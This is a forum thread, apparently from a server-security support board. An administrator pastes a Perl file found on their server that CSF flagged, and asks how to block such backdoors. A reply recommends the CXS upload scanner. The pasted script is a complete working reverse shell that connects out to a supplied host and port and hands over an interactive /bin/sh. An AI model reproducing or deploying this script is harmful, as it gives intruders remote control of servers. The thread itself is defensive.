I have got alert form csf regarding suspicious file bc. pl on the server with the following content.
#!/usr/bin/perl
use Socket;
$iaddr=inet_aton($ARGV[0]) || die("Error: $!\n");
$paddr=sockaddr_in($ARGV[1], $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system('/bin/sh -i');
close(STDIN);
close(STDOUT);
close(STDERR);
This gives direct access to shell of the server. Can someone suggest me how can I stop such kind of backdoor connect script to work rather that checking a alert and manually deleting every time after I get just alert?
Please help with some suggestions to block such kind of hacking attacks.
Thank you!
Block certain suspicious files
Re: Block certain suspicious files
Using CXS is the best way of blocking this. CXS checks every file uploaded to the server and deletes the file on the fly.
Sergio
Sergio